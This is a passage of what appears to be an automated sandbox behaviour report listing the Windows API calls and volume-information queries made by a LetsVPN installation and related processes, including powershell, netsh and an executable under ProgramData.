              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: _getptd,__crtGetLocaleInfoEx,_wcsicmp,wcslen,wcsncpy_s,_invoke_watson,_getptd,_getptd,_LcidFromHexString,GetLocaleInfoW,17_2_6C5F93A9
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: EnumSystemLocalesW,53_2_00868096
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: EnumSystemLocalesW,53_2_008680E1
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,53_2_0086219D
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: EnumSystemLocalesW,53_2_0086817C
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,53_2_00868207
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: EnumSystemLocalesW,53_2_00861CFD
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,53_2_0086845C
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,53_2_00868584
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,53_2_00867DF0
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetLocaleInfoW,53_2_0086868C
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,53_2_0086875F
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A20D8 ??2@YAPEAX_K@Z,GetLastError,??3@YAXPEAX@Z,??2@YAPEAX_K@Z,SetupDiGetDeviceRegistryPropertyW,??3@YAXPEAX@Z,28_2_00007FF7132A20D8
              Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\ProgramData\letsvpn-latest.exeQueries volume information: C:\ VolumeInformation
              Source: C:\ProgramData\letsvpn-latest.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeQueries volume information: C:\Program Files (x86)\letsvpn\driver\tap0901.cat VolumeInformation
              Source: C:\Windows\System32\drvinst.exeQueries volume information: C:\Windows\System32\DriverStore\Temp\{e2ac460a-1ae4-2d4c-8bd6-d2159bd65866}\tap0901.cat VolumeInformation
              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Utils.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\log4net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNDomainModel.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\CommunityToolkit.Mvvm.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\netstandard\v4.0_2.0.0.0__cc7b13ffcd2ddd51\netstandard.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.InteropServices.RuntimeInformation.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Memory.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Runtime.CompilerServices.Unsafe.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Buffers.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsVPNInfraStructure.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Analytics.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.AppCenter.Crashes.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.batteries_v2.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.core.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.provider.dynamic_cdecl.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLitePCLRaw.nativelibrary.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\Hardcodet.Wpf.TaskbarNotification.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\PusherClient.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\WebSocket4Net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SuperSocket.ClientEngine.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\System.Net.Http.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Program Files (x86)\letsvpn\app-3.12.0\SQLite-net.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
